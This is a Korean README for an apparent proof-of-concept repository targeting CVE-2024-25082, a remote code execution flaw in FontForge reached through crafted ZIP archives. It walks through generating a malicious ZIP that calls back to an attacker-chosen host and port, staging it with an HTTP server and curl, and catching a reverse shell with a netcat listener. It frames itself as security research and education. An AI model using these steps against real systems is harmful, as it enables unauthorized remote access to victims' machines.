
CVE-2024-25082에 대한 개념 증명 익스플로잇입니다. 조작된 ZIP 아카이브를 통해 FontForge에서 원격 코드 실행을 시연합니다. 페이로드 생성기, Docker 랩 및 보안 연구 및 교육을 위한 기술 문서를 포함합니다.
CVE-2024-25082에 대한 개념 증명 익스플로잇으로, 조작된 ZIP 아카이브를 통해 **원격 코드 실행(RCE)**을 허용하는 FontForge의 취약점입니다.
이 저장소는 통제된 실험실 환경에서 취약점이 어떻게 악용될 수 있는지 보안 연구 및 교육 목적으로 시연합니다.
취약점은 ZIP 아카이브 내 파일에 대한 부적절한 검증으로 인해 발생하며, 공격자가 대상 시스템에서 임의의 명령을 실행할 수 있습니다.
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│ └── exploit.zip
├── writeup.md
└── License
파일 설명
exploit.py 악성 ZIP 페이로드 생성 poc/ 생성된 개념 증명 파일 포함 writeup.md 취약점에 대한 기술적 설명 License
선택적 도구 설치:
sudo apt install netcat
python3 exploit.py --lhost <Your IP> --lport <Your Port>
exploit.zip 악성 파일이 생성됩니다.
python3 -m http.server 8080
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip
nc -lvnp <Your Port>
성공하면 대상 시스템에서 셸을 획득합니다.
재현 가능한 취약 환경이 docker/ 디렉토리 내에 제공됩니다.
예시:
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln
이를 통해 프로덕션 시스템에 영향을 주지 않고 안전하게 테스트할 수 있습니다.
취약한 애플리케이션에 의해 처리되는 ZIP 파일을 업로드하거나 제어할 수 있는 공격자는 다음을 수행할 수 있습니다:
권장 완화 조치:
이 저장소는 공개적으로 공개된 취약점에 대한 개념 증명 코드를 포함합니다.
코드는 다음 목적으로만 제공됩니다:
명시적 허가 없이 이 코드를 시스템에 사용하지 마십시오.
저자는 이 소프트웨어로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.
Moamen Elmaghrabi
사이버보안 학생
침투 테스트 및 익스플로잇 개발
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다.
자세한 내용은 LICENSE 파일을 참조하십시오.